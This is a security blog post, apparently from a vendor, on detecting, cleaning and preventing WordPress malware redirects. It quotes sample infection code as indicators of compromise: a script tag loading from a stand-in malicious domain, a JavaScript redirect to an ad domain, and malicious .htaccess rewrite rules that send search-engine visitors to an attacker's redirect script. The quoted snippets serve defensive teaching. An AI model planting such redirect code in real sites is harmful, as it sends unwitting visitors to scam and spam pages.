Discussion – 

0

Discussion – 

0

WordPress Malware Redirect: Detection and Fixes

WordPress has helped in tailoring content according to one’s needs across the website. Its large-scale popularity is backed by great community support as well. WordPress has everything for everyone’s needs, providing a wide variety of plugins and add-ons for selection. However, owing to its popularity, the attacks on WordPress sites have become regular events. Attackers are constantly trying to infect sites with attacks like the WordPress malware redirect. The book WordPress 3 Ultimate Security gives a precise explanation of this predicament,

“Worse still is when spam leaves the remit of annoyance to enter the danger zone. It’s often injected into page content, so that sweet tutorial about baking cakes is suddenly laced with links to some scurrilous porn site or, more underhand still, your precious .htaccess site configuration file becomes littered with spam redirects to a rogue site that ruins your users’ as well as your reputation.”

WordPress Malware Redirect: Symptoms

Hackers target WordPress sites on a regular basis. There are certain commonly hacked WordPress files that are often targeted by the attackers, but in the case of a WordPress hacked redirect, the scenario is somewhat different. Here, the attackers inject malicious codes into your site. Often, the admin is unaware of this attack and only gets to know once the users complain. These are the typical behaviors of a “WordPress redirect hack”.

Site visitors are generally redirected to spamming websites or sites related to scams or pornography. Hackers do this for their own purposes like increasing the traffic on their website or entering into users’ private space! The latter one seems to be more hazardous. Fortunately, certain preventive measures can be taken to avoid it in the future such as secure coding practices to prevent these attacks. 

WordPress Malware Redirect: Detection

The heuristic test would be to visit your site from multiple devices. Once the site or some page redirects you, it is most likely to be a malware redirection. From here on, file inspection needs to be done to determine the root cause.

JS Files

Usually, the core files are modified with javascript to create redirections. Themes and plugins are the most vulnerable. In certain instances, the entire rogue themes and plugins are uploaded. However, to automate the process of infecting every .js file, a certain injecting script is used like the one given below.

wordpress malware redirect javascript injector

The script first lists all the files using ‘thescandir’ function of PHP. Afterward, using the ‘if else’ statements, it scans them recursively. Thereafter, all the files with a .js extension are detected using the ‘$file_name’ variable. These files are then injected with javascript code to create redirects. This script also tries to detect the root path of each file. In this case, spreading infection gains a higher success rate if it’s done across multiple sites hosted on a single server. The infected files contain a code that looks like this.

wordpress malware reditect hex code

This code is obfuscated using hex notations. In certain cases, base64 encoding may be used, depending on the malware variant. When decoded, it translates to something like

<script src=”hxxp://malicious.domain/jquery.js”></script>. 

This particular script usually runs on the server from the domain which is found to be malicious. Users are redirected using the code: 

window.location.href= “hxxp://go .ad2up[.]com/afu.php?id=473791. 

This code then displays spam advertisements to the users. Therefore, it becomes important to detect which specific script initiates the WordPress malware redirect!

PHP Files

Apart from .js files, PHP files are also commonly targeted by attackers. Some commonly infected files are:

  • Plugins
  • Themes
  • Header.php
  • Footer.php
  • .htaccess
  • Functions.php

It is advisable to look into the .htaccess file since this file is often used to detect user agents and create redirects. In cases of infection, the .htaccess contains a code like:

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteRule .* http://MaliciousDomain.tld/redirect.php?t=3 [R,L]

Here, the last line of code loads a redirect script called ‘redirect.php’ from the malicious domain. This script then diverts the users to WordPress malware redirect pages. 

However, do note that .htaccess is a sensitive file, which means that improper editing may cause the site to break. So, always consult experts in case you are not familiar with it. Moreover, it is advisable to look into the core files to detect infection. Certain common backdoors like the Filesman Backdoor can be detected using automatic scanners.

Database Tools

At times, the infection may not be in the core files but in the posts or pages of the site. These can be challenging to detect. The scripts may contain code identical to the above given in core files. This can be detected using a database admin tool like PhpMyAdmin, which allows the editing of the infected pages/posts.

WordPress malware redirect mysql search

As shown in the image, the search function of PhpMyAdmin can be used. This would list all the pages/posts containing the malicious script 

hxxp://maliciousSITE[.]com/bad.php 

in their code. Therefore, it makes it easy to detect the WordPress malware redirect within the posts. Moreover, it could also be used to detect if any new admins have been created.

Third-Party Advertisements

WordPress malware redirects can also happen when the site is completely secure. There are situations where the site admins provide provisions for third-party ads for the purpose of revenue generation. Some of these networks do not have a stringent policy for ad content. As a result, those ads may contain code that redirects the users as soon they visit the site. 

These types of redirects are not easy to detect since the code is hosted on their servers. Moreover, it is noteworthy here that this should be the last resort after all the detection methods given above have failed. In that case, stop hosting the ads. If the redirects stop then the infection was due to third-party ads. Contact the ads network regarding this and get the issue resolved!

WordPress Malware Redirect Hack: Cleanup

Clean and Restore Core Files

Firstly, check for any modified files. This can be done in two ways – one is to download a fresh copy and compare checksums. This exercise could be time-consuming. You’re required to log in via SSH and execute the following commands:

find /path-of-www -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r

This command would list all the files modified based on the timestamps. Thereafter, check for malicious code in those files. In case the malicious code is detected, remove it. However, in the case of sensitive files like .htaccess, if you are unsure of what the code is doing, comment it out using the character ‘#‘. Thereafter, restore the files from a backup. In case the backup is unavailable, use a fresh copy.

Find and Remove Obfuscated Code

Some of the malicious code can evade your detection because attackers use techniques like FOPO to hide code. Therefore to find the code in base 64 encodings, use the grep command like this:

find . -name “*.php” -exec grep “base64″‘{}’\; -print &> output.txt

This would save all the content of files containing base64 encoding to the output.txt file. Here, you can proceed to clean those files. If the encoding is in hex format. use the command 

grep -Pr “[\x01\x02\x03]”.

Remove Rogue Users

Visit your Dashboard and check if any users have come up. You’ll also need to delete all the rogue users and combine that with a secure password (change the existing one if it doesn’t fit the required standards). Make sure you keep separate passwords for FTP, Dashboard, etc. Ensure that there are no default or hard encoded passwords, and change all of them to secure random passwords.

Use a Security Solution

Even after following the above-mentioned steps, the WordPress malware redirect hack may stay. Therefore, to detect the last strain of the infection, use an automatic solution. As issues arise, so do the available solutions in the market, so there are no worries of having options. However, certain parameters like cost-effectiveness and detection rate should be considered, especially for small businesses or startups to keep their site secure.

WordPress Malware Redirect Hack: Prevention

Update

Enough can never be said about keeping your installation up to date. Perhaps it is the most economical way to stay secure. Updates contain security patches which can be seen from the changelog. Apart from the core installation, keep the plugins and themes updated and avoid using null or unreputed themes as they may contain buggy code. Use reputed plugins and keep them updated!

Firewall

In case your site is targeted regularly, it is advisable to use a firewall. This solution also helps in keeping the site safe as the firewall inspects all incoming traffic for any suspicious activity. Any bad requests like SQL injections, XSS, LFI, RFI, etc are blocked. Finding a good firewall solution can be tedious especially for beginners. Therefore, one of the easy-to-use and economical solutions is available at Astra Security with great customer feedback. 

WordPress Malware Redirect protection

How Astra Firewall protects its customers

Security Audit

Nothing could be better than discovering the loopholes in your site before the attackers do, which can be revealed in a comprehensive security audit. The audit will scan and find the vulnerable parameters of the site which could be a business logic or a CSRF vulnerability. The security audit and pentesting take care of it all.

Those well-versed in security matters are rare, even more so when issues pop up left and right every other day. Therefore, finding the right people for the job is an equally important task as they can handle your security worries for you, and do so in the right manner. 

Tags:

Anurag

0 Comments

You May Also Like

Subscribe To Our Newsletter

Subscribe To Our Newsletter

Join our mailing list to receive the latest news and updates from our team.

You have Successfully Subscribed!

Share This